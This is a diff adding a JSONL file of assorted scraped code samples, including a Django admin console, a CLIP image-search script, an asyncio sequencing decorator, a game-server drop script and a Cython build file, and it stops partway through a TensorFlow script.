diff --git "a/6561.jsonl" "b/6561.jsonl" new file mode 100644--- /dev/null +++ "b/6561.jsonl" @@ -0,0 +1,827 @@ +{"seq_id":"275912651","text":"from pathlib import Path\nfrom typing import Union\n\nimport networkx as nx\n\n\ndef output_graph(G: nx.DiGraph, file_name: Union[Path, str]) -> None:\n \"\"\"Output a graph to a file, either as image or as dot file.\n\n Args:\n G: the DiGraph to write or plot\n file_name: the file name to write to. Extension can be svg, png or dot.\n\n Returns:\n Nothing\n\n Raises:\n ValueError when the file_name does not end on .svg, .png or .dot\n \"\"\"\n p = nx.drawing.nx_pydot.to_pydot(G)\n if not isinstance(file_name, Path):\n file_name = Path(file_name)\n\n if file_name.suffix == \".svg\":\n p.write_svg(file_name)\n elif file_name.suffix == \".png\":\n p.write_png(file_name)\n elif file_name.suffix == \".dot\":\n p.write_dot(file_name)\n else:\n raise ValueError(\"Extension should be .dot, .svg or .png\")\n","sub_path":"src/visions/utils/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"68309996","text":"import os\nimport argparse\nimport torch\nimport pdb\n\nimport clip\nfrom tokenizer import ClipTokenizer\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nimport pickle\nimport glob\nimport math\nfrom tqdm import tqdm\nfrom ast import literal_eval\n\nfrom searcher import Searcher\n\n\ndef encode_texts(text, model, tokenizer, device):\n text = tokenizer(text, return_tensors=\"pt\")\n text = text.to(device)\n text_embedding = model.encode_text(text)\n return text_embedding\n\ndef readimage(image_path):\n image = Image.open(image_path).convert('RGB')\n return image\n\ndef plot(query, hits):\n num = len(hits)\n \n plt.figure(figsize=(20, 14))\n for i, hit in enumerate(hits):\n image = readimage(hit['path'])\n plt.subplot(5, math.ceil(num / 5), i+1)\n plt.imshow(image)\n plt.title(f\"pid:{hit['pid']}\\nscore:{float(hit['score']):.3f}\", fontsize=12)\n plt.xticks([])\n plt.yticks([])\n plt.tight_layout()\n plt.savefig(f'{query}.png',bbox_inches=\"tight\")\n plt.cla()\n plt.clf()\n plt.close()\n\ndef main(args):\n # device\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n device = torch.device(device)\n \n # Setting tokenizer\n tokenizer = ClipTokenizer(\n bpe_path=args.bpe_path,\n context_length=args.text_length\n )\n print(f'Load Tokenizer with Vocab {tokenizer.vocab_size} Max Length {tokenizer.context_length} Complete')\n \n \n # Model\n if args.pretrain_clip == 'ViT-B/32':\n model = clip.model.CLIP(\n **vitb32_config(\n input_res=args.image_resolution,\n context_length=args.text_length,\n vocab_size=tokenizer.vocab_size\n )\n )\n \n elif args.pretrain_clip == 'RN50':\n model = clip.model.CLIP(\n **rn50_config(\n input_res=args.image_resolution,\n context_length=args.text_length,\n vocab_size=tokenizer.vocab_size\n )\n ) \n elif args.pretrain_clip == 'RN101':\n model = clip.model.CLIP(\n **rn101_config(\n input_res=args.image_resolution,\n context_length=args.text_length,\n vocab_size=tokenizer.vocab_size\n )\n ) \n else:\n raise NotImplementedError(f'{args.pretrain_clip} not implemented')\n ckpt = torch.load(args.load_model)\n state_dict = {k.partition('model.')[2]: v for k,v in ckpt['state_dict'].items()}\n model.load_state_dict(state_dict)\n model.to(device)\n model.eval()\n \n \n # Image Embedding\n paths = []\n embs = torch.tensor([])\n pbar = tqdm(list(glob.glob(os.path.join(args.emb_path, '*.pt')))[:50])\n for emb_file in pbar:\n ckpt = torch.load(emb_file)\n paths += literal_eval(ckpt['path'])\n embs = torch.cat((embs, ckpt['emb']),dim=0)\n pbar.set_postfix({'num_images': str(len(paths))})\n \n # Use GPU\n embs = embs.to(device)\n print('Path example:', paths[0])\n print('Embedding example:', embs[0].shape)\n \n searcher = Searcher(embs, paths)\n \n # Search\n while(True):\n word = input('Search words:')\n word = word.strip()\n if len(word) > 0:\n word_embedding = encode_texts(word, model, tokenizer, device)\n hits = searcher.search(word_embedding, top_k=[args.topk])[0]\n plot(word, hits)\n \n \nif __name__=='__main__': \n parser = argparse.ArgumentParser()\n parser.add_argument('--load_model', type=str, default='models/model.ckpt', required=False)\n parser.add_argument('--pretrain_clip', default='ViT-B/32', type=str, required=False, help='RN50, RN101, ViT-B/32')\n parser.add_argument('--text_length', default=77, type=int, required=True)\n parser.add_argument('--bpe_path', default='src_openai_pretrain/bpe_simple_vocab_16e6.txt.gz', type=str, required=False)\n parser.add_argument('--image_resolution', default=224, type=int, required=True)\n parser.add_argument('--emb_path', default='./dataset/yfcc100m/emb')\n parser.add_argument('--topk', default=25, type=int)\n args = parser.parse_args()\n \n \n main(args)","sub_path":"src_openai_pretrain/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584682111","text":"def solution(clothes):\n answer = 0\n keys = clothes[1][1]\n number = 0\n line = []\n mul = 1\n \n while clothes:\n for i in clothes:\n if i[1] == keys:\n number += 1\n clothes.remove(i)\n\n line.append(number)\n number = 0\n \n for j in line:\n answer += j\n mul *= j\n \n return answer+mul\n\n\nprint(solution([[\"yellowhat\", \"headgear\"], [\"bluesunglasses\", \"eyewear\"], [\"green_turban\", \"headgear\"]]))","sub_path":"programmers/clothes.py","file_name":"clothes.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"63401813","text":"\n\n#calss header\nclass _PARTICULAR():\n\tdef __init__(self,): \n\t\tself.name = \"PARTICULAR\"\n\t\tself.definitions = [u'details or information about a person or an event, especially when officially recorded: ', u'If you are considering the particular, you are considering single examples rather than general matters or ideas: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_particular.py","file_name":"_particular.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633330730","text":"\"\"\"\ndotenv Note\n\nPython で環境変数を取得するノート。\nwaka-box で実践してる。\n\npip install python-dotenv\npipenv install python-dotenv\n\nos.environ['SECRET_API_KEY'] KeyError あり。\nos.getenv('SECRET_API_KEY') None が返る。\n\n\n.env で複数行を書くときは\nFOO=\"こう\nです\n\"\n\"\"\"\n\n\nclass EnvNotFoundError(WakaBoxException):\n \"\"\"特定の環境変数が見つからないことを表す例外クラス。\n\n Arguments:\n WakaBoxException {[type]} -- [description]\n \"\"\"\n\n\n# .env で環境変数を取得する場合に対応します。\n# raise_error_if_not_found: .env が見つからなくてもエラーを起こさない。\ndotenv.load_dotenv(dotenv.find_dotenv(raise_error_if_not_found=False))\n\n\ndef get_env(keyname: str) -> str:\n \"\"\"環境変数を取得します。\n\n Arguments:\n keyname {str} -- 環境変数名。\n\n Raises:\n EnvNotFoundError: 環境変数が見つからない。\n\n Returns:\n str -- 環境変数の値。\n \"\"\"\n try:\n # GitHub Actions では環境変数が設定されていなくても yaml 内で空文字列が入ってしまう。空欄チェックも行います。\n _ = os.environ[keyname]\n if not _:\n raise KeyError(f'{keyname} is empty.')\n return _\n except KeyError as e:\n raise EnvNotFoundError(keyname) from e\n","sub_path":"01_Python/(2020-07-13)dotenvNote.py","file_name":"(2020-07-13)dotenvNote.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653012738","text":"# Essentially just extends auth.views but separated to keep it from\n# getting overly unwieldy\nfrom auth.views import *\n\ndef console(request, template=None):\n\n context = {}\n errors = []\n templates = [\n \"ajax\",\n \"customers\",\n \"media\",\n \"pages\",\n \"settings\",\n \"theme\",\n \"vendors\",\n \"logout\",\n ]\n\n if template:\n template = template.replace(\"/\",\"\")\n\n if template and template not in templates:\n return redirect(\"/console/\")\n\n try:\n site = Site.objects.get(domain=request.META['HTTP_HOST'])\n except Site.DoesNotExist:\n raise Exception(\"Congratulations! Your domain %s points to the correct site, but your site is not configured to use it.\")\n\n if template == \"logout\":\n logout(request)\n return redirect(\"/console/?prev=logout\")\n elif (\n request.POST.get('username', None) != None\n and request.POST.get('password', None) != None\n ):\n form = AuthForm(data=request.POST, site=request.site) # 'username' and 'password' is expected in POST in each request\n if not form.is_valid():\n status = -1\n message = \"Login failed:\"\n for error in form.errors['__all__']:\n errors.append(\"%s %s\" % (message, error))\n template=\"login\"\n else:\n user = User.objects.get(username=form.cleaned_data['username'])\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n return redirect(\"/console/\")\n\n if errors:\n pass # Do nothing -- Login failed\n elif not request.user.is_authenticated(): \n template=\"login\"\n elif not (\n request.user.is_superuser\n or (\n request.user.userprofile.site_admin\n and request.user.userprofile.site.domain == request.META['HTTP_HOST']\n )\n ):\n errors.append(\"You do not have administrative privileges for %s\" % site.name)\n template=\"login\"\n\n else:\n template=template or \"dashboard\"\n context=eval(\"console_%s(request, site)\" % template)\n if type(context) != dict:\n return context\n\n if (\"%s\" % request.GET.get('msg',\"\")).strip() != \"\":\n errors.append(request.GET['msg']);\n\n if request.GET.get(\"prev\",\"\") == \"logout\":\n errors = [\"Log out was successful\"] + errors\n\n context.update({\n 'errors' : errors,\n 'template' : template,\n })\n\n return render_to_response(\n \"console/%s.html\" % (\n (\"%s\" % (template or \"login\")),\n ),\n context,\n context_instance=RequestContext(request)\n )\n\ndef console_ajax(request, site):\n\n context = {\n 'status' : 0,\n 'message' : \"Unknown request\",\n }\n\n cmd = request.POST.get('cmd')\n\n if cmd == \"approve\":\n from auth.admin import approve_account_action\n try:\n p = UserProfile.objects.get(\n site=site,\n pk=request.POST.get('profilePk')\n )\n if not p.submitted or not p.validated:\n context['message'] = \"This account is in the wrong state for approval\"\n elif not p.approved:\n approve_account_action(None, None, UserProfile.objects.filter(pk=p.pk))\n context['status'] = 1\n else:\n context['message'] = \"This account has already been approved\"\n except UserProfile.DoesNotExist:\n context['message'] = \"Unknown user\"\n\n elif cmd in [\"activate\",\"deactivate\"]:\n try:\n p = UserProfile.objects.get(\n site=site,\n pk=request.POST.get('profilePk')\n )\n if not p.submitted or not p.validated or not p.approved:\n context['message'] = \"This account is in the wrong state for a change in activation status\"\n elif p.user == request.user:\n context['message'] = 'You cannot change the activation status of your own account'\n elif not p.user.is_active and cmd == \"activate\":\n User.objects.filter(pk=p.user.pk).update(is_active=True)\n context['status'] = 1\n elif p.user.is_active and cmd == \"deactivate\":\n User.objects.filter(pk=p.user.pk).update(is_active=False)\n context['status'] = 1\n else:\n context['message'] = \"No change in activation status\"\n except UserProfile.DoesNotExist:\n context['message'] = \"Unknown user\"\n\n elif cmd in [\"grant-admin\",\"revoke-admin\"]:\n try:\n p = UserProfile.objects.get(\n site=site,\n pk=request.POST.get('profilePk')\n )\n if not p.submitted or not p.validated or not p.approved or not p.user.is_active:\n context['message'] = \"This account is in the wrong state for a change in admin status\"\n elif p.user == request.user:\n context['message'] = 'You cannot change the admin status of your own account'\n elif not p.site_admin and cmd == \"grant-admin\":\n UserProfile.objects.filter(pk=p.pk).update(site_admin=True)\n context['status'] = 1\n elif p.user.is_active and cmd == \"revoke-admin\":\n UserProfile.objects.filter(pk=p.pk).update(site_admin=False)\n context['status'] = 1\n else:\n context['message'] = \"No change in admin status\"\n except UserProfile.DoesNotExist:\n context['message'] = \"Unknown user\"\n\n return HttpResponse(\n json.dumps(context),\n mimetype=\"application/json\"\n )\n\ndef console_customers(request, site):\n\n from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n pp = 25\n page = request.GET.get('p', 1) # Validated below after pagination\n\n buyers = Buyer.objects.filter(userprofile__site = request.site).order_by(\"-pk\")\n\n # Query filter\n if (\"%s\" % request.GET.get('q',\"\")).strip() != \"\":\n\n terms = request.GET['q'].split(' ')\n for t in terms:\n if t.strip() == '':\n continue\n regex = (\"(?=.*%s).*\" % re.escape(t))\n buyers = buyers.filter(\n Q(userprofile__user__first_name__iregex = regex)\n | Q(userprofile__user__last_name__iregex = regex)\n | Q(name__iregex = regex)\n | Q(userprofile__user__email__iregex = regex)\n | Q(userprofile__fedtaxid__iregex = regex)\n )\n\n # Registration status\n if request.GET.get('submitted') == 'N':\n buyers = buyers.exclude(userprofile__submitted=True)\n elif request.GET.get('submitted') == 'Y':\n buyers = buyers.filter(userprofile__submitted=True)\n\n # Email validation status\n if request.GET.get('validated') == 'N':\n buyers = buyers.exclude(userprofile__validated=True)\n elif request.GET.get('validated') == 'Y':\n buyers = buyers.filter(userprofile__validated=True)\n\n # Account Aproval Status\n if request.GET.get('approved') == 'N':\n buyers = buyers.exclude(userprofile__approved=True)\n elif request.GET.get('approved') == 'Y':\n buyers = buyers.filter(userprofile__approved=True)\n\n # Account Status\n if request.GET.get('active') == 'N':\n buyers = buyers.exclude(userprofile__user__is_active=True)\n elif request.GET.get('active') == 'Y':\n buyers = buyers.filter(userprofile__user__is_active=True)\n\n # Admin Status\n if request.GET.get('site_admin') == 'N':\n buyers = buyers.exclude(userprofile__site_admin=True)\n elif request.GET.get('site_admin') == 'Y':\n buyers = buyers.filter(userprofile__site_admin=True)\n\n # Paginate the search\n P = Paginator(buyers, pp)\n\n # Validate page number\n try: page = int(page)\n except ValueError: page = 1\n page = 1 if (page < 1 or page > P.num_pages) else page\n\n # Get customer data for this page\n try:\n page_data = P.page(page)\n except PageNotAnInteger:\n page_data = P.page(1)\n except EmptyPage:\n page_data = P.page(P.num_pages)\n\n return {\n \"form\" : ConsoleCustomerForm(request.GET),\n \"total_matches\" : buyers.count(),\n \"page\" : page,\n \"pages\" : max(P.page_range),\n \"GET_str_no_page\" : \"%s\" % \"&\".join([\"%s=%s\" % (k, request.GET[k]) for k in request.GET.keys() if k != \"p\"]),\n \"page_range\" : range(1, max(P.page_range) + 1),\n \"start\" : ((page - 1) * pp) + 1,\n \"stop\" : P.count if (((page - 1) * pp) + pp > P.count) else ((page - 1) * pp) + pp,\n \"users\" : page_data.object_list,\n }\n\ndef console_dashboard(request, site):\n return {}\n\ndef console_media(request, site):\n\n if request.POST.get('delete'):\n try:\n request.site.mediaimages.get(\n pk=int(request.POST.get('delete'))\n ).delete()\n return HttpResponse(\n json.dumps({\"status\" : 1}),\n mimetype=\"application/json\"\n )\n\n except Exception as e:\n return HttpResponse(\n json.dumps({\n \"status\" : 0,\n \"message\" : \"%s\" % e,\n }),\n mimetype=\"application/json\"\n )\n\n elif request.GET.get('qqfile'):\n\n try:\n\n form = ConsoleMediaForm(\n { 'site' : request.site.pk },\n { 'image' : request.FILES[request.GET['qqfile']] },\n )\n if form.is_valid():\n form.save()\n else:\n raise Exception(\n \" \".join(\n dict(form.errors.items()).get('image',[\"Unexpected upload error\"])\n )\n )\n\n except Exception as e:\n return HttpResponse(\n json.dumps({\n \"error\" : \"%s\" % e,\n }),\n mimetype=\"application/json\"\n )\n\n return HttpResponse(\n json.dumps({\"success\" : 1}),\n mimetype=\"application/json\"\n )\n\n return {}\n\ndef console_pages(request, site):\n\n try:\n page = request.site.pages.get(pk=request.GET.get('page'))\n except Exception as e:\n if request.GET.get('page') == \"new\":\n page = SitePage(site=request.user.userprofile.site)\n else:\n page = site.profile.homepage\n\n if page not in request.site.profile.reserved_pages and request.GET.get('action') == \"delete\":\n name = \"%s\" % page.title\n page.delete()\n return redirect('/console/pages/?msg=The page \"%s\" was successfully deleted.' % name)\n\n if request.method == \"POST\":\n\n data = copy.deepcopy(request.POST)\n\n data['home'] = False\n data['contact'] = False\n data['termspage'] = False\n\n if page == site.profile.homepage:\n data['title'] = 'Home Page'\n data['home'] = True\n data['published'] = True\n data['link_only'] = False\n data['sort_order'] = 0\n data['slug'] = 'index'\n elif page == site.profile.contactpage:\n data['published'] = True\n data['contact'] = True\n data['link_only'] = False\n data['slug'] = 'contactus'\n data['contents'] = ' '\n elif page == site.profile.termspage:\n data['published'] = True\n data['termspage'] = True\n data['link_only'] = False\n data['slug'] = 'termsandconditions'\n\n if data.get('link_only') == \"True\":\n data['slug'] = '#' # Our urls.py only looks for alphanum, so this won't do anything\n\n form = ConsolePageForm(data, instance=page)\n if form.is_valid():\n form.save()\n if request.GET.get('page') == \"new\":\n return redirect(\"/console/pages/?page=%s\" % form.instance.pk)\n else:\n form = ConsolePageForm(instance=page)\n\n return {\n 'form' : form,\n 'pages' : request.site.pages.order_by(\"pk\"),\n }\n\ndef console_settings(request, site):\n\n if request.method == \"POST\":\n\n siteform = ConsoleSettingsSiteForm(request.POST, instance=site)\n siteprofileform = ConsoleSettingsSiteProfileForm(request.POST, request.FILES) #, instance=site.profile)\n\n if siteform.is_valid():\n siteform.save()\n if siteprofileform.is_valid():\n if (site.profile.logo and 'logo' in request.FILES) or request.POST.get('logo-clear', \"\") != \"\":\n site.profile.logo.delete() # delete it\n if (site.profile.favicon and 'favicon' in request.FILES) or request.POST.get('favicon-clear', \"\") != \"\":\n site.profile.favicon.delete() # delete it\n # If we instantiate initially with te instance, we lose reference to the original files and can't delete them\n siteprofileform = ConsoleSettingsSiteProfileForm(request.POST, request.FILES, instance=site.profile)\n siteprofileform.save()\n return redirect(\"/console/settings/\")\n\n else:\n siteform = ConsoleSettingsSiteForm(instance=site)\n siteprofileform = ConsoleSettingsSiteProfileForm(instance=site.profile)\n\n return {\n \"siteform\" : siteform,\n \"siteprofileform\" : siteprofileform,\n }\n\ndef console_theme(request, site):\n\n # Get a list of all files included in include.css\n file = open(\"%stheme/site-%s/css/include.css\" % (MEDIA_ROOT, site.pk), \"r\")\n contents = file.read()\n file.close()\n\n lines = [(\"%s\" % l).strip() for l in contents.split(\"\\n\")]\n filenames = [\"include.css\"]\n for line in lines:\n if line[0:7] != \"@import\":\n continue\n filenames.append(\n line.split(\" \")[1].strip()[4:-1]\n )\n\n # Get the contents of the specifically requested file (if applicable)\n contents = \"\"\n if request.GET.get('file'):\n path = \"%stheme/site-%s/css/%s\" % (MEDIA_ROOT, site.pk, request.GET['file'])\n if request.POST.get('contents', None) != None:\n file = open(path, \"r+\")\n file.write(request.POST['contents'])\n file.close()\n\n try:\n file = open(path, \"r\")\n contents = file.read()\n file.close()\n except:\n contents = \"\"\n return {\n \"filenames\" : filenames,\n \"contents\" : contents,\n }\n\ndef console_vendors(request, site):\n\n from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n pp = 25\n page = request.GET.get('p', 1) # Validated below after pagination\n\n vendors = Vendor.objects.filter(userprofile__site = request.site).order_by(\"-pk\")\n\n # Query filter\n if (\"%s\" % request.GET.get('q',\"\")).strip() != \"\":\n\n terms = request.GET['q'].split(' ')\n for t in terms:\n if t.strip() == '':\n continue\n regex = (\"(?=.*%s).*\" % re.escape(t))\n vendos = vendors.filter(\n Q(userprofile__user__first_name__iregex = regex)\n | Q(userprofile__user__last_name__iregex = regex)\n | Q(name__iregex = regex)\n | Q(userprofile__user__email__iregex = regex)\n | Q(userprofile__fedtaxid__iregex = regex)\n )\n\n # Registration status\n if request.GET.get('submitted') == 'N':\n vendors = vendors.exclude(userprofile__submitted=True)\n elif request.GET.get('submitted') == 'Y':\n vendors = vendors.filter(userprofile__submitted=True)\n\n # Email validation status\n if request.GET.get('validated') == 'N':\n vendors = vendors.exclude(userprofile__validated=True)\n elif request.GET.get('validated') == 'Y':\n vendors = vendors.filter(userprofile__validated=True)\n\n # Account Aproval Status\n if request.GET.get('approved') == 'N':\n vendors = vendors.exclude(userprofile__approved=True)\n elif request.GET.get('approved') == 'Y':\n vendors = vendors.filter(userprofile__approved=True)\n\n # Account Status\n if request.GET.get('active') == 'N':\n vendors = vendors.exclude(userprofile__user__is_active=True)\n elif request.GET.get('active') == 'Y':\n vendors = vendors.filter(userprofile__user__is_active=True)\n\n # Admin Status\n if request.GET.get('site_admin') == 'N':\n vendors = vendors.exclude(userprofile__site_admin=True)\n elif request.GET.get('site_admin') == 'Y':\n vendors = vendors.filter(userprofile__site_admin=True)\n\n # Paginate the search\n P = Paginator(vendors, pp)\n\n # Validate page number\n try: page = int(page)\n except ValueError: page = 1\n page = 1 if (page < 1 or page > P.num_pages) else page\n\n # Get customer data for this page\n try:\n page_data = P.page(page)\n except PageNotAnInteger:\n page_data = P.page(1)\n except EmptyPage:\n page_data = P.page(P.num_pages)\n\n return {\n \"form\" : ConsoleCustomerForm(request.GET),\n \"total_matches\" : vendors.count(),\n \"page\" : page,\n \"pages\" : max(P.page_range),\n \"GET_str_no_page\" : \"%s\" % \"&\".join([\"%s=%s\" % (k, request.GET[k]) for k in request.GET.keys() if k != \"p\"]),\n \"page_range\" : range(1, max(P.page_range) + 1),\n \"start\" : ((page - 1) * pp) + 1,\n \"stop\" : P.count if (((page - 1) * pp) + pp > P.count) else ((page - 1) * pp) + pp,\n \"users\" : page_data.object_list,\n }\n \nclass ConsoleCustomerForm(forms.Form):\n q = forms.CharField()\n submitted = forms.TypedChoiceField(\n choices=(('', 'Either'), ('Y','Submitted'), ('N','Not Submitted')),\n widget=forms.RadioSelect\n )\n validated = forms.TypedChoiceField(\n choices=(('', 'Either'), ('Y','Validated'), ('N','Not Validated')),\n widget=forms.RadioSelect\n )\n approved = forms.TypedChoiceField(\n choices=(('', 'Either'), ('Y','Approved'), ('N','Awaiting Approval')),\n widget=forms.RadioSelect\n )\n active = forms.TypedChoiceField(\n choices=(('', 'Either'), ('Y','Active'), ('N','Inactive')),\n widget=forms.RadioSelect\n )\n site_admin = forms.TypedChoiceField(\n choices=(('', 'Either'), ('Y','Site Admin'), ('N','Non-Admin')),\n widget=forms.RadioSelect\n )\n\nclass ConsolePageForm(forms.ModelForm):\n link_only = forms.TypedChoiceField(\n coerce=lambda x: x == 'True',\n choices=((False, 'Page With Content'), (True, 'Link')),\n widget=forms.RadioSelect\n )\n class Meta:\n model = SitePage\n exclude = [\"site\"]\n\nclass ConsoleMediaForm(forms.ModelForm):\n image = forms.ImageField()\n class Meta:\n model = SiteMediaImage\n\nclass ConsoleSettingsSiteForm(forms.ModelForm):\n class Meta:\n model = Site\n\nclass ConsoleSettingsSiteProfileForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(ConsoleSettingsSiteProfileForm, self).__init__(*args, **kwargs)\n for key in [\n \"tagline\",\n \"metadescription\",\n \"metakeywords\",\n \"logo\",\n \"favicon\",\n \"facebook_id\",\n \"twitter_id\",\n \"linkedin_id\",\n \"googleplus_id\",\n ]:\n self.fields[key].required = False\n\n class Meta:\n model = SiteProfile\n exclude = [\"site\"]\n","sub_path":"auth/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":19786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"389072613","text":"import asyncio\nfrom collections import deque\nfrom functools import wraps\nfrom typing import Dict, List\n\nimport attr\n\n\n@attr.s(auto_attribs=True)\nclass Context:\n in_queue: asyncio.Queue\n out_queue: asyncio.Queue\n initialized: bool\n\n\ncontexts: Dict[str, Context] = {}\n\n\ndef run_sequentially_in_context(target_args: List[str] = None):\n \"\"\"All request to function with same calling context will be run sequentially.\n\n Example:\n\n Given the following decorated function\n\n @run_sequentially_in_context(target_args=[\"param3\", \"param1\"])\n async def func(param1, param2, param3):\n await asyncio.sleep(1)\n\n The context will be formed by the values of the arguments \"param3\" and \"param1\".\n The values must be serializable as they will be converted to string\n and put together as storage key for the context.\n\n The below calls will all run in a sequence:\n\n functions = [\n func(1, \"something\", 3),\n func(1, \"argument.attribute\", 3),\n func(1, \"here\", 3),\n ]\n await asyncio.gather(*functions)\n\n note the special \"argument.attribute\", which will use the attribute of argument to create the context.\n\n The following calls will run in parallel, because they have different contexts:\n\n functions = [\n func(1, \"something\", 3),\n func(2, \"else\", 3),\n func(3, \"here\", 3),\n ]\n await asyncio.gather(*functions)\n\n \"\"\"\n target_args = [] if target_args is None else target_args\n\n def internal(decorated_function):\n def get_context(args, kwargs: Dict) -> Context:\n arg_names = decorated_function.__code__.co_varnames[\n : decorated_function.__code__.co_argcount\n ]\n search_args = dict(zip(arg_names, args))\n search_args.update(kwargs)\n\n key_parts = deque()\n for arg in target_args:\n sub_args = arg.split(\".\")\n main_arg = sub_args[0]\n if main_arg not in search_args:\n message = (\n f\"Expected '{main_arg}' in '{decorated_function.__name__}'\"\n f\" arguments. Got '{search_args}'\"\n )\n raise ValueError(message)\n context_key = search_args[main_arg]\n for attribute in sub_args[1:]:\n potential_key = getattr(context_key, attribute)\n if not potential_key:\n message = f\"Expected '{attribute}' attribute in '{context_key.__name__}' arguments.\"\n raise ValueError(message)\n context_key = potential_key\n\n key_parts.append(f\"{decorated_function.__name__}_{context_key}\")\n\n key = \":\".join(map(str, key_parts))\n\n if key not in contexts:\n contexts[key] = Context(\n in_queue=asyncio.Queue(),\n out_queue=asyncio.Queue(),\n initialized=False,\n )\n\n return contexts[key]\n\n @wraps(decorated_function)\n async def wrapper(*args, **kwargs):\n context: Context = get_context(args, kwargs)\n\n if not context.initialized:\n context.initialized = True\n\n async def worker(in_q: asyncio.Queue, out_q: asyncio.Queue):\n while True:\n awaitable = await in_q.get()\n in_q.task_done()\n try:\n result = await awaitable\n except Exception as e: # pylint: disable=broad-except\n result = e\n await out_q.put(result)\n\n asyncio.create_task(worker(context.in_queue, context.out_queue))\n\n await context.in_queue.put(decorated_function(*args, **kwargs))\n\n wrapped_result = await context.out_queue.get()\n if isinstance(wrapped_result, Exception):\n raise wrapped_result\n\n return wrapped_result\n\n return wrapper\n\n return internal\n","sub_path":"services/director-v2/src/simcore_service_director_v2/utils/async_utils.py","file_name":"async_utils.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"413593620","text":"import sys\r\nfrom open.brasil.gameserver.datatables\t\timport ItemTable\r\nfrom open.brasil.gameserver.model.quest\t\timport State\r\nfrom open.brasil.gameserver.model.quest\t\timport QuestState\r\nfrom open.brasil.gameserver.model.quest.jython\timport QuestJython as JQuest\r\nfrom open.brasil.util import Rnd \r\n\r\nBOX = 29116\r\n\r\ndef dropItem(npc,itemId,count):\r\n\tditem = ItemTable.getInstance().createItem(\"Loot\", itemId, count, None)\r\n\tditem.dropMe(npc, npc.getX(), npc.getY(), npc.getZ());\r\n\r\nclass baylorChest(JQuest):\r\n\tdef __init__(self,id,name,descr):\r\n\t\tself.isSpawned = False\r\n\t\tJQuest.__init__(self,id,name,descr)\r\n\r\n\tdef onKill (self,npc,player,isPet):\r\n\t\tchance = Rnd.get(100)\r\n\t\tif chance <= 1 :\r\n\t\t\tdropItem(npc,9470,1)\r\n\t\telif chance >= 2 and chance <= 32 :\r\n\t\t\tdropItem(npc,6578,2)\r\n\t\telse:\r\n\t\t\tdropItem(npc,6704,10)\r\n\t\treturn\r\n\r\nQUEST = baylorChest(-1, \"baylorChest\", \"ai\")\r\n\r\nQUEST.addKillId(BOX)","sub_path":"dp/data/scripts/ai/individual/baylorChest.py","file_name":"baylorChest.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"204506087","text":"#from distutils.core import setup\nfrom setuptools import setup\nfrom distutils.extension import Extension\n#from setuptools import Extension\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\n\n# setup.py file\nimport sys\nimport os\nimport shutil\n\n\n# clean previous build\nfor root, dirs, files in os.walk(\".\", topdown=False):\n for name in files:\n if (name.startswith(\"civy\") and not(name.endswith(\".pyx\") or name.endswith(\".pxd\"))):\n os.remove(os.path.join(root, name))\n for name in dirs:\n if (name == \"build\"):\n pass\n #shutil.rmtree(name)\n\ninc_dirs = [os.getcwd(), 'freeciv/utility', 'freeciv/gen_headers', 'freeciv/common', 'freeciv/common/networking', 'freeciv/server', 'freeciv/common/aicore',\n #'/usr/local/include',\n #'/usr/include'\n ]\ndepends = [#'freeciv/utility/log.h', 'freeciv/server/srv_main.h', './freeciv/common/game.h',\n #'/usr/include/bzlib.h'\n ]\nsourcefiles = ['civy.pyx',#'freeciv/common/game.c', 'freeciv/utility/log.c', 'freeciv/utility/deprecations.c'\n ]\nextensions = [\n Extension('civy', \n sourcefiles, \n include_dirs=inc_dirs,\n libraries=['freeciv'],\n extra_compile_args=[\"-fopenmp\", \n \"-O3\"],\n extra_link_args=[\"-DSOME_DEFINE_OPT\", \n \"-L/usr/include\"\n #'-framework', 'BZ'\n ]\n )]\nsetup(\n cmdclass = {'build_ext': build_ext},\n ext_modules=cythonize(extensions,\n compiler_directives={'language_level': \"3\"}),\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"190642544","text":"#----------------------------------------------------------------------\r\n# deep learning classifier using a multiple layer perceptron (MLP)\r\n# batch normalization was used\r\n# TensorBoard support:\r\n# :scalars:\r\n# - accuracy\r\n# - wieghts and biases\r\n# - cost/cross entropy\r\n# - dropout\r\n# :images:\r\n# - reshaped input\r\n# - conv layers outputs\r\n# - conv layers weights visualisation\r\n# :graph:\r\n# - full graph of the network\r\n# :distributions and histograms:\r\n# - weights and biases\r\n# - activations\r\n# :checkpoint saving:\r\n# - checkpoints/saving model\r\n# - weights embeddings\r\n#\r\n# :to be implemented:\r\n# - image embeddings (as in https://www.tensorflow.org/get_started/embedding_viz)\r\n# - ROC curve calculation (as in http://blog.csdn.net/mao_feng/article/details/54731098)\r\n#-------------------------------------------------------------------------------------------\r\n\r\nimport 